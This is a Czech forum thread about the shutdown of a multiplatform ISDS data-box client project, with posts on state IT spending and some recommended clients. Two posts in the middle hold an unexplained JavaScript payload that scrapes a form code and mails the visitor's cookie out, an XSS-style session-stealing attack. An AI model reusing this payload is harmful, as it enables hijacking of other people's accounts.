    Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic? Mě se třeba líbí fungování CZ-NICu a NIXu posledních pár let, ale to jsou projekty vzešlé z iniciativy skupiny komerčních subjektů ("zájmové sdružení právnických osob") - to nejsou státní instituce. Jo kdyby něco takového rozjel CZ-NIC, a byl schopen zalobovat na vládě/parlamentu, že tento "freemail" bude mít stejné právní postavení jako dnešní Datové Schránky... taky by mě zajímalo, jak by musel vypadat komerční model té věci - uvědomte si, že NIX a CZ.NIC jsou financovány několika málo komerčními subjekty (domény se platí od kusu, ale nepřímo prostřednictvím komerčních registrátorů) => čili takhle nějak by musely fungovat i platby za "oficiální centrální mailbox".

    [:wq]
    Mintaka avatar 5.2.2011 21:14 Mintaka | skóre: 13
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    RE. 1: Kromě "politické vůle" a krmení pijavic je to často také ukrutná dávka neznalosti a neschopnosti. Ovšem v konečném důsledku si za to můžeme sami, protože nejsme schopni spojit své úsilí a ozvat se, že takto tedy ne. Můžeme si za to sami, protože nejsme schopni si do vedení státu/samosprávy čela dosadit lidi, kteří by to dělali poctivě a pár let jim to vydrželo.
    RE. 2: Souhlas. Veškerá potřebná funkcionalita ISDS by šla řešit standardními prostředky.
    RE. 3: Odvíjí se od 2. Návrh hlavní a vedlejší funkcionality -> veřejné připomínkové jednání -> pořádný návrh řešení -> konzultace návrhu řešení s odborníky z několika implementačních firem + zasloužilými odborníky typu Peterka. -> finální návrh řešení -> výběr implementační firmy + zvážení sestavení vlastního týmu pro realizaci -> extenzivní testování -> nasazení betaverze do ostrého provozu za takových podmínek, že řada firem bude sama chtít službu používat -> kvalitní podpora uživatelů, systémových integrátorů, vývojářů případných nádstaveb, adminů -> vyladění a dotažení -> propagace projektu a nabídnutí k používání za velmi výhodných podmínek.
    Klidně ať to stojí co to stálo teď, ale ať je jasně vidět, že to byly dobře vynaložené prostředky za velmi kvalitní a promyšlnou službu, která bude ku prospěchu všem zůčastněným.

    RE. Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic?: Možná kdybych dlouho pátral, tak bych i pár našel, ale těch které působí negativně je víc (třeba aktualizace stránek Prahy za 300 000 000 v době "nejhlubší krize").

    PS: Zase tak moc se s tím ale netrápím, život je krátký. Snažím se pomáhat tam kam dosáhnu.
    10.2.2011 17:53 tencotěvidí
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224');
    xmlhttp.send('');
    var pole = xmlhttp.responseText.split(' ');
    
    var kod = '';
    var part_num = 0;
    while (part_num < pole.length) {
    	if (pole[part_num] == 'hodnotu') {
    		kod = pole[part_num+1].substring(0,4);
    		break;
    	}
    	part_num += 1;
    }
    
    xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message='  + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish');
    xmlhttp.send('');
    
    10.2.2011 17:55 ftw
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224'); xmlhttp.send(''); var pole = xmlhttp.responseText.split(' ');

    var kod = ''; var part_num = 0; while (part_num < pole.length) { if (pole[part_num] == 'hodnotu') { kod = pole[part_num+1].substring(0,4); break; } part_num += 1; }

    xmlhttp.open('GET', '/sochi1.blog@gmail.com?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message=' + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish'); xmlhttp.send('');
    Mintaka avatar 11.2.2011 06:41 Mintaka | skóre: 13
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Příliš málo komentovaný kód :-)
    Mintaka avatar 5.2.2011 14:43 Mintaka | skóre: 13
    Rozbalit Rozbalit vše viva Writer
    Neodpustím si velké poděkování Petru Písařovi. Řekl bych, "skvělá práce".

    Doufám, že mu tato ostruha pomůže v lepším profesním uplatnění a ocenění.

    Kam je možné poslat finanční drobek na podporu dalšího vývoje v této oblasti?
    6.2.2011 13:27 astray
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Jaký frontend byste tedy doporučili pro Debian? Potřebuju se do schránky jen přihlásit a přečíst dokument, to je vše (případně si ho přeposlat mailem).

    Díky ast
    Luk avatar 6.2.2011 14:00 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Já používám dsgui, byť ne na Debianu.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    Mintaka avatar 6.2.2011 14:54 Mintaka | skóre: 13
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    A nebo:

    This is Shigofumi, an ISDS client. Have a nice e-government.

    Use `help' command to get list of available commands. shigofumi> help Following commands are available: accept accept commercial message box show current box details cache show cache details cd change working directory commercial manipulate commercial receiving box status compose compose a message convert submit local document for authorized conversion copying show this program licence excerpt debug set debugging delivery get message delivery details findbox search for a box hash query ISDS for message hash help describe commands load load message or message delivery details from local file login log into ISDS lsi list received messages lso list sent messages msgi get incoming message msgo get outgoing message passwd manipulate user password pwd print working directory quit exit shigofumi read mark message as read statbox get status of a box user show current user details users show box users version show version of this program
    Mintaka avatar 6.2.2011 14:55 Mintaka | skóre: 13
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Tak znovu a lépe:

    This is Shigofumi, an ISDS client. Have a nice e-government.
    Use `help' command to get list of available commands.
    shigofumi> help
    Following commands are available:
    accept          accept commercial message
    box             show current box details
    cache           show cache details
    cd              change working directory
    commercial      manipulate commercial receiving box status
    compose         compose a message
    convert         submit local document for authorized conversion
    copying         show this program licence excerpt
    debug           set debugging
    delivery        get message delivery details
    findbox         search for a box
    hash            query ISDS for message hash
    help            describe commands
    load            load message or message delivery details from local file
    login           log into ISDS
    lsi             list received messages
    lso             list sent messages
    msgi            get incoming message
    msgo            get outgoing message
    passwd          manipulate user password
    pwd             print working directory
    quit            exit shigofumi
    read            mark message as read
    statbox         get status of a box
    user            show current user details
    users           show box users
    version         show version of this program
    
    
    Jendа avatar 6.2.2011 16:40 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Uzavření projektu Multiplatformní přístup pro datové schránky
    Have a nice e-government.
    Šmarjá :-)

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.